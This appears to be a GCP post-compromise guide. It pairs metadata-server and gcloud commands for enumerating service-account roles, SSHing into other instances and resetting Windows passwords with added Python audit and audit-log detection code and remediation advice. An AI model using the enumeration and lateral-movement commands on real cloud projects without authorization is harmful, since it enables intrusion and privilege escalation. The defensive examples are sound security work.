Once a GCP VM instance has been compromised, the environment can be enumerated from it. Most of the steps below use the gcloud utility, which is installed by default on Compute Engine images, and the metadata server at metadata.google.internal (169.254.169.254).

Basic enumeration

Check project name:

PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id -H "Metadata-Flavor: Google" -s)

Check account name:

ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email -H "Metadata-Flavor: Google" -s)

Enumerate scopes:

curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'

Enumerate the service account's roles:

gcloud projects get-iam-policy $PROJECT --flatten="bindings[].members" --format='table(bindings.role)' --filter="bindings.members:$ACCOUNT"

The Editor role is the one granted by default to the Compute Engine service account, and it is broad enough to allow privilege escalation.
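A defender can check the same two conditions the paragraphs above rely on, a service account bound to a basic role and a token scope that is not limited to a single API, without running commands on a VM. The following is an added example, not code from the original page: it takes the JSON that gcloud projects get-iam-policy --format=json produces and the newline-separated body the metadata scopes endpoint returns, and flags the risky combinations. The sample policy, project number and account names are constructed for the example.

```python
import json

# Basic ("primitive") roles that confer broad, project-wide permissions.
BASIC_ROLES = {"roles/owner", "roles/editor"}

# OAuth scope that lets a token exercise every IAM permission the account
# holds, rather than being restricted to one Google API.
FULL_SCOPE = "https://www.googleapis.com/auth/cloud-platform"


def find_basic_role_bindings(policy, member_prefix="serviceAccount:"):
    """Return sorted (member, role) pairs for members starting with
    member_prefix that are bound to a basic role in an IAM policy document
    (the structure gcloud ... get-iam-policy --format=json emits)."""
    hits = []
    for binding in policy.get("bindings", []):
        role = binding.get("role")
        if role not in BASIC_ROLES:
            continue
        for member in binding.get("members", []):
            if member.startswith(member_prefix):
                hits.append((member, role))
    return sorted(hits)


def has_full_scope(scopes_text):
    """scopes_text is the body returned by
    .../instance/service-accounts/default/scopes: one scope per line."""
    scopes = {line.strip() for line in scopes_text.splitlines() if line.strip()}
    return FULL_SCOPE in scopes


def is_default_compute_sa(email, project_number):
    """The Compute Engine default service account has a fixed naming scheme."""
    return email == f"{project_number}-compute@developer.gserviceaccount.com"


def audit(policy, scopes_text, sa_email, project_number):
    """Combine the checks into a list of human-readable findings."""
    findings = []
    for member, role in find_basic_role_bindings(policy):
        findings.append(f"{member} holds basic role {role}")
    if has_full_scope(scopes_text):
        findings.append(f"{sa_email} token carries {FULL_SCOPE}")
    if is_default_compute_sa(sa_email, project_number):
        findings.append(f"{sa_email} is the Compute Engine default service account")
    return findings


# Constructed sample input (not real project data).
SAMPLE_PROJECT_NUMBER = "123456789012"
SAMPLE_SA = f"{SAMPLE_PROJECT_NUMBER}-compute@developer.gserviceaccount.com"
SAMPLE_POLICY = json.loads(json.dumps({
    "etag": "BwXconstructed=",
    "bindings": [
        {"role": "roles/editor",
         "members": [f"serviceAccount:{SAMPLE_SA}", "user:alice@example.com"]},
        {"role": "roles/viewer",
         "members": ["serviceAccount:reader@example-proj.iam.gserviceaccount.com"]},
        {"role": "roles/owner", "members": ["user:bob@example.com"]},
    ],
}))
SAMPLE_SCOPES = (
    "https://www.googleapis.com/auth/devstorage.read_only\n"
    "https://www.googleapis.com/auth/logging.write\n"
    "https://www.googleapis.com/auth/cloud-platform\n"
)

if __name__ == "__main__":
    for finding in audit(SAMPLE_POLICY, SAMPLE_SCOPES, SAMPLE_SA, SAMPLE_PROJECT_NUMBER):
        print("FINDING:", finding)
```

Remediation for each finding is the standard one: replace the Editor binding on the default service account with a custom role that lists only the permissions the workload needs, and create the instance with a dedicated service account and narrow scopes instead of cloud-platform.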

This can be done by SSHing into other machines in the project.

List instances:

gcloud compute instances list

SSH into an instance:

gcloud compute ssh $INSTANCENAME

For Windows instances:

gcloud compute reset-windows-password <INSTANCE-NAME> --user=<USERNAME>

This command creates the user if the account does not exist; otherwise it resets that user's password.
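Both of the commands above leave a trace that a defender can alert on: gcloud compute ssh (without OS Login) pushes a public key into the ssh-keys metadata entry, and gcloud compute reset-windows-password writes an encryption key into the windows-keys entry, so each shows up in Admin Activity audit logs as a metadata write. The following detection logic is an added example, not code from the original page. It assumes Cloud Audit Log entries in their JSON export form, with the method names v1.compute.instances.setMetadata and v1.compute.projects.setCommonInstanceMetadata and the request items nested under protoPayload.request.items; the three log lines are constructed for the example.

```python
import json

# Metadata keys whose modification grants interactive access to a VM.
WATCHED_KEYS = {"ssh-keys", "windows-keys"}

# Audit-log method names for instance-level and project-level metadata writes
# (assumed to match the JSON export of Compute Engine Admin Activity logs).
METADATA_METHODS = {
    "v1.compute.instances.setMetadata",
    "v1.compute.projects.setCommonInstanceMetadata",
}


def key_injection_events(log_lines):
    """Scan newline-delimited JSON audit-log entries and return one dict per
    entry that writes an ssh-keys or windows-keys metadata item.

    A write performed by a service account (rather than a human) is the
    pattern produced when a compromised VM's credentials are used to reach
    other instances, so that case is marked separately."""
    findings = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        entry = json.loads(line)
        payload = entry.get("protoPayload", {})
        method = payload.get("methodName", "")
        if method not in METADATA_METHODS:
            continue
        items = payload.get("request", {}).get("items", [])
        keys = sorted({item.get("key") for item in items} & WATCHED_KEYS)
        if not keys:
            continue
        principal = payload.get("authenticationInfo", {}).get("principalEmail", "")
        findings.append({
            "principal": principal,
            "method": method,
            "resource": payload.get("resourceName", ""),
            "keys": keys,
            # Service accounts always live under gserviceaccount.com.
            "by_service_account": principal.endswith(".gserviceaccount.com"),
        })
    return findings


def _entry(method, principal, resource, item_keys):
    """Build one constructed audit-log line in the assumed export shape."""
    return json.dumps({
        "protoPayload": {
            "methodName": method,
            "authenticationInfo": {"principalEmail": principal},
            "resourceName": resource,
            "request": {"items": [{"key": k, "value": "<redacted>"} for k in item_keys]},
        },
        "severity": "NOTICE",
    })


# Constructed sample log: a Windows password reset driven by the default
# compute service account, a harmless startup-script update, and an SSH key
# push by a human operator at project level.
SAMPLE_LOG = [
    _entry("v1.compute.instances.setMetadata",
           "123456789012-compute@developer.gserviceaccount.com",
           "projects/example-proj/zones/us-central1-a/instances/win-dc-1",
           ["windows-keys"]),
    _entry("v1.compute.instances.setMetadata",
           "alice@example.com",
           "projects/example-proj/zones/us-central1-a/instances/web-1",
           ["startup-script"]),
    _entry("v1.compute.projects.setCommonInstanceMetadata",
           "alice@example.com",
           "projects/example-proj",
           ["ssh-keys", "enable-oslogin"]),
]

if __name__ == "__main__":
    for finding in key_injection_events(SAMPLE_LOG):
        flag = "SERVICE-ACCOUNT" if finding["by_service_account"] else "user"
        print(f"[{flag}] {finding['principal']} wrote {finding['keys']} on {finding['resource']}")
```

Enabling OS Login on the project removes the ssh-keys metadata path entirely, which both shrinks the attack surface the page describes and makes any remaining ssh-keys write an unambiguous signal.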